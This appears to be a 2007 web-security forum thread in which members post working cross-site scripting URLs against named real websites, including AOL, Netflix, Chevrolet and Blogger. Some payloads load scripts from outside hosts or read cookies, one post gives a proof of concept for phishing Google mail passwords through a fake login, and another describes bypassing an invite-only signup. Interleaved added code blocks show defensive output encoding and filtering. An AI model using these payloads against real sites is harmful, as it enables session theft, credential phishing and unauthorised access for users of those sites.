Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: malorn
Date: January 18, 2007 03:08AM

http://www.statcounter.com/help/knowledge_base/search_knowledge_base.php?seachtext="><script>alert('xss')</script>



Edited 1 time(s). Last edit at 01/18/2007 03:09AM by malorn.

Re: So it begins
Posted by: Lockdown
Date: January 18, 2007 04:18AM

malorn Wrote:
-------------------------------------------------------
> http://www.statcounter.com/help/knowledge_base/sea
> rch_knowledge_base.php?seachtext=">alert('xss')

http://www.statcounter.com/help/knowledge_base/search_knowledge_base.php?seachtext=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

As for the fact that Easy discovered that, I see his 1 exploit and I raise him 8 =P
Linkage: http://www.rawrcore.net/?p=9

^^ All my discoveries as far as I know ^^

Re: So it begins
Posted by: Patchy
Date: January 18, 2007 05:13PM

2600 website: http://www.2600.com/cgi-bin/covers.pl?issue=2.gif%22%3E%3C/a%3E%3Cscript%3Ealert(%22Xss%22)%3C/script%3E



Edited 2 time(s). Last edit at 01/18/2007 05:14PM by Patchy.

Re: So it begins
Posted by: maluc
Date: January 18, 2007 06:05PM

lol at 2600.. although it probably doesn't have much practical use, it's still amusing to see.

-maluc

Re: So it begins
Posted by: nEUrOO
Date: January 18, 2007 07:26PM

http://www.lyricsfreak.com/search.php?q=%3Cscript%20src=http://rgaucher.info/p.js%3E

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: So it begins
Posted by: trev
Date: January 18, 2007 07:28PM

http://service.spiegel.de/digas/servlet/find?S=%22%2Balert%28%22XSS%22%29%2B%22%5C%22

This page does some weird escaping, e.g. brackets in the date fields are escaped - but not if you put a quotation mark there as well.

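Added example, not part of the thread: the links posted so far land in two different output contexts, a quoted HTML attribute and a JavaScript string literal, and each needs its own encoder. The sample values are URL-decoded parameters from links in this thread; the render functions are hypothetical.

```javascript
// Added example. SAMPLES are URL-decoded parameter values from links in
// this thread; renderSearchBox/renderInlineScript are hypothetical templates.
const SAMPLES = [
  "\"><script>alert('xss')</script>",
  "'+alert('XSS')+'",
  "\" onmouseover=\"alert('XSS')",
  "';alert(/xss/);//",
];

// Incomplete filter: escaping only angle brackets leaves quotes intact, so a
// value can still close an attribute or a script string literal.
function bracketsOnly(value) {
  return String(value).replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// HTML body / quoted-attribute context.
function encodeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: every code unit outside [A-Za-z0-9 ]
// becomes \uXXXX, so quotes, backslashes, line breaks and "</script>"
// cannot terminate the literal or the surrounding element.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderSearchBox(q) {
  return '<input name="q" value="' + encodeHtml(q) + '">';
}

function renderInlineScript(q) {
  return "<script>var term = '" + encodeJsString(q) + "';</script>";
}

// Each sample under the weak filter and under both context encoders.
function report() {
  return SAMPLES.map((s) => ({
    weak: bracketsOnly(s),
    attr: renderSearchBox(s),
    script: renderInlineScript(s),
  }));
}

console.log(JSON.stringify(report(), null, 2));
```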
Re: So it begins
Posted by: trev
Date: January 18, 2007 07:44PM

http://www.heise.de/fastbin/heisejobs/schnellsuche.pl?such_text=test%20OR%20%27%3E%3Cscript%20src=%22http://ha.ckers.org/xss.js%22%3E%3C/script%3E%3C%27

Re: So it begins
Posted by: trev
Date: January 18, 2007 07:47PM

http://www.focus.de/videos/'+alert('XSS')+'

Re: So it begins
Posted by: unsticky
Date: January 18, 2007 08:09PM

http://television.aol.com/?zip=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://television.aol.com/?zip=';alert(/xss/);//

Re: So it begins
Posted by: trev
Date: January 18, 2007 08:15PM

http://www.chip.de/artikel/c1_artikel_13626342.html?data%5BEMail%5D=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22&action=neuanmeldung_doit

Re: So it begins
Posted by: unsticky
Date: January 18, 2007 08:18PM

idk if this one's been posted yet or not, probably has... but I'm just trying to stay away from aol :X
http://www.tmz.com/search/?q=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E

http://www.bloglines.com/login?r=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

Re: So it begins
Posted by: trev
Date: January 18, 2007 08:25PM

http://www.pcwelt.de/index.cfm?action=extendedsearch&query=&pid=930&yeardateto=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22

Re: So it begins
Posted by: trev
Date: January 18, 2007 08:42PM

http://www.zdnet.de/suchen/index.htm?query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22

Re: So it begins
Posted by: trev
Date: January 18, 2007 11:41PM

http://afisha.yandex.ru/search/?city=MSK&text=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22

Re: So it begins
Posted by: trev
Date: January 19, 2007 12:06AM

http://lokales.suche.gmx.net/YM/Poi/Poi.aspx?Catchword=%22+onmouseover%3D%22alert%28%27XSS%27%29

Re: So it begins
Posted by: Patchy
Date: January 19, 2007 12:30AM

http://www.putfile.com/cat.php?cat=%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Re: So it begins
Posted by: trev
Date: January 19, 2007 12:31AM

Only Firefox:
http://games-suche.gmx.de/spiele.html?q=%22%3Cscript%3C%21--%0Aalert%28%22XSS%22%29%3C%2Fscript+a%3D%22&c=

Re: So it begins
Posted by: trev
Date: January 19, 2007 12:42AM

http://www.torg.ru/catalog/search.php?price_from=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E%3C%22

Re: So it begins
Posted by: trev
Date: January 19, 2007 12:50AM

Only Firefox: http://soft.mail.ru/search_result_header.php?words=%22+style%3D-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29+%22

Re: So it begins
Posted by: id
Date: January 19, 2007 01:32AM

good to see some new poster

-id

Re: So it begins
Posted by: Lockdown
Date: January 19, 2007 01:51AM

Irony, thy name is XSS

http://www.ic3.gov/search.aspx?q=%3Cscript%3Ealert(%22Oh%20the%20cruel%20irony%22);%3C/script%3E

www.rawrcore.net plz <3

-Lockdown-

http://www.rawrcore.net

Re: So it begins
Posted by: trev
Date: January 19, 2007 07:01AM

http://www.search.com/search?q=%27%7Dalert%28%27XSS%27%29%3B%7B%27asdfasfsfasd - have to click "search within these results"

Re: So it begins
Posted by: trev
Date: January 19, 2007 07:05AM

A better one: http://www.search.com/search?q.lit=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&adv=1&channel=1

Advanced search has no filtering whatsoever.

Re: So it begins
Posted by: eyeced
Date: January 19, 2007 09:24AM

Okay this was horrendous, after finding xss in blogspot the other day in kuza55's profile, I soon discovered it was a site-wide issue and affected a lot more people than kuza55. The xss is in the search tag, for example:

http://domain.blogspot.com/search?q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27hi%27%29%3C%2Fscript%3E

I thought I'd create an account and enter a 'blog entry' to see what was filtered. I started with the obvious, <script>alert('hi')</script>, which returned the error the tag <script> is not allowed, so I then tried <iframe>, <frameset>, <body> etc... all were disallowed. I then saw that it was possible to insert pictures into the blog, so I tried img src=javascript:alert('hi') which worked fine, but only in Internet Explorer. I then began testing to see which I could get working in Firefox, and after having a quick reference to the cheat sheet I used the xml moz-binding, so on my profile I now have xss working regardless of browser. I really thought on such a major site that it would have been a lot more secure than this, especially as a worm on a site of this nature would do a lot of damage.

Anyway - the url is http://eyeced.blogspot.com - I wouldn't go checking there for blogs though, as the only reason I created it was simply for testing.

Edit: this would be a way of easily harvesting Google mail passwords as well from the masses that use blogspot.

PoC - <IMG SRC="javascript:x=document.createElement('script');x.src='http//fakebloggerlogin';document.body.appendChild(x);">

the fakebloggerlogin page would simply be a page on your server to which the user would be none the wiser, he/she would sign in, their details would then be posted to your server, then they could be redirected to the page they should have originally been sent to. Or if you want to make it look amazingly real, you could even use their details to log them in, and take them to the logged in page...



Edited 1 time(s). Last edit at 01/19/2007 09:36AM by eyeced.

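Added example, not from the post and not Blogger's code: a tag blocklist like the one described lets an <img> through without looking at its attributes, whereas an allowlist that checks URL schemes and drops style does not. The parsed-element shape, the allowlists and blog.example are assumptions.

```javascript
// Added example. Elements are assumed to be already parsed into
// { tag, attrs }; the allowlists and blog.example are hypothetical.
const BLOCKED_TAGS = new Set(["script", "iframe", "frameset", "body"]);

// Tag blocklist as described in the post: <img> is not on it, so its src
// and style values are never examined.
function blocklistFilter(el) {
  return BLOCKED_TAGS.has(el.tag.toLowerCase()) ? null : el;
}

const ALLOWED = new Map([
  ["a", ["href", "title"]], ["img", ["src", "alt"]], ["b", []], ["i", []], ["p", []],
]);
const URL_ATTRS = new Set(["href", "src"]);

// Parse the way a browser does (the URL parser strips tabs, newlines and
// surrounding whitespace before reading the scheme); keep only http(s).
function safeUrl(value) {
  try {
    const u = new URL(String(value), "https://blog.example/");
    return u.protocol === "http:" || u.protocol === "https:" ? u.href : null;
  } catch {
    return null;
  }
}

// Allowlist: unknown tags are rejected, unknown attributes (style, on*)
// are dropped, URL attributes must resolve to an allowed scheme.
function allowlistFilter(el) {
  const tag = el.tag.toLowerCase();
  const allowedAttrs = ALLOWED.get(tag);
  if (!allowedAttrs) return null;
  const attrs = {};
  for (const [name, value] of Object.entries(el.attrs || {})) {
    const key = name.toLowerCase();
    if (!allowedAttrs.includes(key)) continue;
    const clean = URL_ATTRS.has(key) ? safeUrl(value) : String(value);
    if (clean !== null) attrs[key] = clean;
  }
  return { tag, attrs };
}

// Constructed inputs modelled on what the post says was tried.
const IMG_JS = { tag: "IMG", attrs: { SRC: "javascript:alert('hi')" } };
const IMG_STYLE = { tag: "img", attrs: { src: "photo.jpg",
  style: "-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)" } };

console.log(blocklistFilter(IMG_JS), allowlistFilter(IMG_JS), allowlistFilter(IMG_STYLE));
```

Whatever survives the filter still has to be written back out with attribute-context encoding.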
Re: So it begins
Posted by: unsticky
Date: January 20, 2007 02:00PM

http://www.zippyvideos.com/video_search.z?q=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E&x=0&y=0

Re: So it begins
Posted by: malorn
Date: January 20, 2007 09:33PM

https://www.stubhub.com/?gSec=login&nameLogin=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Another ScanAlert - HackerSafe website



Edited 1 time(s). Last edit at 01/20/2007 09:34PM by malorn.

Re: So it begins
Posted by: kuza55
Date: January 20, 2007 10:42PM

I've been away for the past 8 days so I missed this, but the good thing about blogger is that it implements defence in depth rather well, because all the actual editing and authentication occurs (as far as I can tell) on the blogger.com domain, and no authentication cookies or anything are stored on the blogspot.com domain, and therefore the exploit doesn't really get you anything other than the ability to fake content, which (at least for me) isn't too worrying.

If on the other hand you manage to find an XSS flaw on the blogger.com domain, then it'll be a very serious issue.

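Added example, not from the post and not Blogger's code: the separation kuza55 describes follows from RFC 6265 domain matching, which decides which hosts' requests and scripts see a cookie. The cookie names and jar contents are constructed.

```javascript
// Added example. Constructed cookie jar; names are hypothetical. hostOnly
// means the Set-Cookie header carried no Domain attribute.
const JAR = [
  { name: "blogger_session", domain: "blogger.com", hostOnly: false, httpOnly: false },
  { name: "editor_prefs", domain: "www.blogger.com", hostOnly: true, httpOnly: false },
  { name: "csrf_seed", domain: "blogger.com", hostOnly: false, httpOnly: true },
  { name: "blog_theme", domain: "eyeced.blogspot.com", hostOnly: true, httpOnly: false },
];

function isIpLiteral(host) {
  return /^\d+(\.\d+){3}$/.test(host) || host.includes(":");
}

// RFC 6265 section 5.1.3: identical, or a dot-delimited suffix of a host name.
function domainMatch(host, cookieDomain) {
  const h = host.toLowerCase();
  const d = cookieDomain.toLowerCase().replace(/^\./, "");
  return h === d || (h.endsWith("." + d) && !isIpLiteral(h));
}

function matching(host, jar) {
  const h = host.toLowerCase();
  return jar.filter((c) => (c.hostOnly ? h === c.domain : domainMatch(h, c.domain)));
}

// Cookies the browser attaches to a request for `host`.
function sentTo(host, jar = JAR) {
  return matching(host, jar).map((c) => c.name);
}

// Cookies a script running on `host` can read via document.cookie.
function readableByScript(host, jar = JAR) {
  return matching(host, jar).filter((c) => !c.httpOnly).map((c) => c.name);
}

// A script on a blogspot.com host sees none of the blogger.com cookies;
// a lookalike host that merely ends in "blogger.com" does not match either.
for (const host of ["eyeced.blogspot.com", "www.blogger.com", "notblogger.com"]) {
  console.log(host, readableByScript(host));
}
```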
Re: So it begins
Posted by: malorn
Date: January 21, 2007 02:23AM

http://www.doostang.com/sign_up2.asp?fid=46221&nzap=76145&act=2&uname=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Apparently this is some new social networking site by Stanford and MIT alumni. What is really funny is this is an invite only network. A simple modification of the fid and nzap numbers and you can get yourself in via some person you don't even know (like the above link).

So sign yourself up and get an account if you'd like ;)

Re: So it begins
Posted by: malorn
Date: January 21, 2007 03:22AM

http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp?query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

http://www-5.jeep.com/webselfservice/jeep/index.jsp?screenName=customer')%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&country=us&emailUrl=goToEmailForm%28%27R%27%29



Edited 1 time(s). Last edit at 01/21/2007 03:27AM by malorn.

Re: So it begins
Posted by: Lockdown
Date: January 21, 2007 03:05PM

http://jobs.netflix.com/applyFlix.asp?act=dologin&cocode=flix&email=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

Netflix =0

-Lockdown-

http://www.rawrcore.net
